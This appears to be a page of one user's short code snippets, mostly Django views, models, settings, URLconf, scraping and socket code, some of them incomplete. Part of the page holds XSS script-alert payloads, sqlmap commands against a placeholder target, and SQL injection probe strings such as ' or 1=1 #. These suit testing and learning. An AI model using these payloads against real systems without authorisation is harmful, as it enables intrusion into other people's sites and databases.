Xifeng2009 Xifeng2009

View Ajax
# In app/views.py
import random
from django.http import JsonResponse
def ajax_1(request):
    """Answer an AJAX call with a JSON object holding one random integer.

    The response body has a single key, ``data``, whose value is drawn from
    1 to 999 inclusive. The ``random`` module is not a cryptographic
    generator, so this value is demo data only and must not be reused as a
    token or identifier.
    """
    payload = dict(data=random.randint(1, 999))
    return JsonResponse(payload)
# In templates
<input id="a1" value="AAA">
<button id="b1" class="button">Click!</button>
View Base4 of MTV: POST
# In app/forms.py
from django import forms
from .models import Topic
class TopicForm(forms.ModelForm):
class Meta:
model = Topic
fields = ['title', 'text']
labels = {
'title': 'Title: ',
'text': 'Text: ',
View Base3 of MTV: Foreign Key
# In models.py
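class Comment(models.Model):
    """A comment that belongs to one Topic."""

    # on_delete is mandatory from Django 2.0 onwards; CASCADE is the behaviour
    # older releases applied implicitly, so existing rows are treated the same.
    topic = models.ForeignKey(Topic, on_delete=models.CASCADE)
    # The text is optional: the column is nullable and the form field may be blank.
    comment = models.CharField(max_length=200, null=True, blank=True, verbose_name='评论')
    # Set once, when the row is first saved.
    date_added = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')

    class Meta:
        verbose_name_plural = 'comments'

    def __str__(self):
        """Return the first ten characters of the comment, or '' when it is unset."""
        # comment is nullable, and slicing None would raise TypeError.
        return (self.comment or '')[:10]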
View Base2 of MTV: ORM
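# In settings.py
# NOTE: the values below are placeholders. Connect with a dedicated least-privilege
# MySQL account rather than root, and read the password from the environment or a
# secrets store instead of committing it to the settings file.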
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'mysql',
'USER': 'root',
'PASSWORD': 'YOUR PASSWORD',
'HOST': '127.0.0.1',
'PORT': '3306',
}
View Base of MTV
# In project/urls.py
from django.conf.urls import url, include
# Root URLconf: the empty prefix pattern hands every request path to the
# URLconf in main.urls, registered under the "main" namespace.
urlpatterns = [url(r'', include('main.urls', namespace='main'))]
# In app/urls.py
from django.conf.urls import url
from . import views
View XSS: Payload
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”);</script>
<script>alert(‘XSS’)</script>
“><script>alert(“XSS”)</script>
<script>alert(/XSS”)</script>
<script>alert(/XSS/)</script>
View SQLMAP: 目标&请求
#1 根据url进行注入 -u
sqlmap -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users
# 输出详细等级
-v [1-7]
-v/-vv/-vvv/-vvvv
#2 直连数据库 -d
sqlmap -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users
View SQL Injection: MySQL
#1 判断盲注
1 and 1=2
1 and 1=1
#2 整型注入
1 or 1=1 #
#3 字符型注入
1' or 1=1 #
View BeautifulSoup
# 文档
https://beautifulsoup.readthedocs.io/zh_CN/v4.4.0/
import requests
from bs4 import BeautifulSoup
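all_url = 'http://www.mzitu.com/all/'
# NOTE(review): `headers` is not defined in the visible part of this snippet;
# it has to exist before this call or the line raises NameError.
# requests applies no timeout by default, so an unresponsive server would hang
# the script forever; bound the wait explicitly.
start_html = requests.get(all_url, headers=headers, timeout=10)
# Parsers that can be named here: html.parser, lxml-xml, xml, html5lib
Soup = BeautifulSoup(start_html.text, "lxml")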
# 获取a标签的链接
View Socket: Server
import socket
import threading
class Connection:
    """Record for one client: an id, a connection object and a peer address."""

    def __init__(self, cid, conn, addr):
        """Store the three arguments on the instance unchanged.

        presumably ``conn`` is an accepted socket and ``addr`` its peer
        address; confirm against the code that creates instances.
        """
        self.cid, self.conn, self.addr = cid, conn, addr